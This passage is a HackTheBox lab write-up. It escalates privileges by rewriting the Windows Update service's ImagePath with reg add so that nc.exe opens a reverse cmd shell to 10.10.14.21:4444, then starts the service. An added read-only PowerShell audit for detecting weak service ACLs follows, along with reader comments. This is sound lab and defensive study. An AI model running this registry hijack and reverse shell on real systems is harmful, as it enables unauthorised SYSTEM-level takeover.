PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data Provider for Oracle
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data 
                          BUILTIN\Users Allow  ReadKey
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : CDPUserSvc_4248c
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4248c
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : CDPUserSvc_4afaf
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : CDPUserSvc_80d08
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : CDPUserSvc_ee306
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
                          BUILTIN\Users Allow  -1610612736
                          BUILTIN\Users Allow  ReadKey
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
                          BUILTIN\Users Allow  -1610612736
                          BUILTIN\Users Allow  ReadKey
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService_4248c
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService_4afaf
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService_80d08
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService_ee306
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863-2974-47D1-89E0-E507677AA14F}
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863-2974-47D1-89E0-E507677AA14F}
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl

Abusing Services

I have a list of services over which Hector holds FullControl. The service “wuauserv” is the one I should use, as per the hint I received on the HTB forum.

wuauserv is the Windows Update service. It is started on demand rather than running permanently: it runs for a couple of minutes, checks whether a Windows Update is in progress, and stops itself if there is nothing to do.

*Evil-WinRM* PS C:\Users\Hector\Documents> Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv


DependOnService     : {rpcss}
Description         : @%systemroot%\system32\wuaueng.dll,-106
DisplayName         : @%systemroot%\system32\wuaueng.dll,-105
ErrorControl        : 1
FailureActions      : {128, 81, 1, 0...}
ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName          : LocalSystem
RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType      : 1
Start               : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB  : 167
SvcMemSoftLimitInMB : 88
Type                : 32
PSPath              : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName         : wuauserv
PSDrive             : HKLM
PSProvider          : Microsoft.PowerShell.Core\Registry


If you remember the retired machine Helpline, I exploited the Windows print spooler service there to run my nc.exe. I’m going to use the same practice to exploit this machine: rewrite the service’s ImagePath so that it launches nc.exe instead of svchost.exe, then start the service.

*Evil-WinRM* PS C:\Users\Hector\Documents> reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.21 4444 -e cmd" /f
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.21 4444 -e cmd" /f
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Hector\Documents> 

Start Listening:

Start Service

*Evil-WinRM* PS C:\Users\Hector\Documents> 
*Evil-WinRM* PS C:\Users\Hector\Documents> Start-Service wuauserv
Start-Service wuauserv
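As a defensive counterpart to the enumeration and the ImagePath rewrite above, here is an added PowerShell audit of my own (not code from the original writeup). It lists service keys where a principal outside the trusted set holds write rights, and flags ImagePath values that no longer look like the service’s original launcher: a shared-process service not hosted by svchost.exe (exactly what the reg add above produces for wuauserv), or a binary without a valid Authenticode signature. The $trusted list is an assumption; extend it for your environment.

```powershell
# Added example, not from the original writeup. Read-only audit of
# HKLM\SYSTEM\CurrentControlSet\Services; run from an elevated PowerShell
# so that every service key is readable.
$servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Principals expected to hold write rights on service keys (assumption;
# adjust to your baseline).
$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
             'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')

# Rights that let a caller change how a service is launched. ReadKey bits are
# deliberately excluded so read-only ACEs are not reported.
$writeMask = [int]([System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership')

# Generic access bits are not RegistryRights members, so Get-Acl prints them
# as raw negative integers: -1610612736 (0xA0000000) in the dump above is
# GENERIC_READ|GENERIC_EXECUTE and grants no write access.
$GENERIC_ALL   = 0x10000000
$GENERIC_WRITE = 0x40000000

function Test-WriteRight {
    param([int]$Rights)
    return (($Rights -band $writeMask) -ne 0) -or
           (($Rights -band $GENERIC_ALL) -ne 0) -or
           (($Rights -band $GENERIC_WRITE) -ne 0)
}

# (1) Service keys writable by a principal outside the trusted set.
function Find-WeakServiceAcl {
    Get-ChildItem $servicesRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }
        foreach ($rule in $acl.Access) {
            if ($rule.AccessControlType -ne 'Allow') { continue }
            $who = $rule.IdentityReference.Value
            if ($trusted -contains $who) { continue }
            if (Test-WriteRight ([int]$rule.RegistryRights)) {
                [pscustomobject]@{
                    Service   = $key.PSChildName
                    Principal = $who
                    Rights    = $rule.RegistryRights
                    Inherited = $rule.IsInherited
                }
            }
        }
    }
}

# (2) ImagePath values that do not look like the service's original launcher.
function Find-SuspiciousImagePath {
    Get-ChildItem $servicesRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $key   = $_
        $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $props -or -not $props.ImagePath) { return }
        $image = [Environment]::ExpandEnvironmentVariables($props.ImagePath)
        # A shared-process service (Type 0x20, code in Parameters\ServiceDll)
        # is always launched through svchost.exe; wuauserv is one of them.
        $dll = (Get-ItemProperty -Path "$($key.PSPath)\Parameters" -Name ServiceDll -ErrorAction SilentlyContinue).ServiceDll
        $isShared = (($props.Type -band 0x20) -ne 0) -or $dll
        $reason = $null
        if ($isShared -and $image -notmatch '(?i)\\svchost\.exe') {
            $reason = 'shared-process service not launched via svchost.exe'
        } elseif ($image -match '(?i)^"?([^"]+?\.exe)') {
            $exe = $Matches[1]
            if (Test-Path -LiteralPath $exe) {
                $sig = Get-AuthenticodeSignature -FilePath $exe
                if ($sig.Status -ne 'Valid') { $reason = "binary signature status: $($sig.Status)" }
            }
        }
        if ($reason) {
            [pscustomobject]@{ Service = $key.PSChildName; ImagePath = $props.ImagePath; Reason = $reason }
        }
    }
}

Write-Host '== Non-trusted principals with write rights on service keys =='
Find-WeakServiceAcl | Format-Table -AutoSize
Write-Host '== ImagePath values that do not look like the original launcher =='
Find-SuspiciousImagePath | Format-Table -AutoSize
```

On the box above, the first report would list Hector with FullControl on wuauserv, and after the reg add the second would flag wuauserv because a Type 32 service now points at nc.exe rather than svchost.exe.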

Reverse Shell As Administrator

Root.txt

Thank you for reading, hope you enjoyed.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n


duckie
8 months ago

hey, mate

I also found the service through the HackTheBox forum hint. Any idea how the vuln service was originally meant to be found, I mean without any hint?

I tried brute force on all the available services but that didn’t work.

Hamed
4 months ago

Hey dude,
Thank you for your nice and useful writeups.

Two points you may not know:

1- You don’t need WhiteWinterWolf to upload plink.exe. You can use sqlmap to upload it the same way you uploaded your php shell.

2- You couldn’t ssh back to your box as root because it is disabled by default in the /etc/ssh/sshd_config
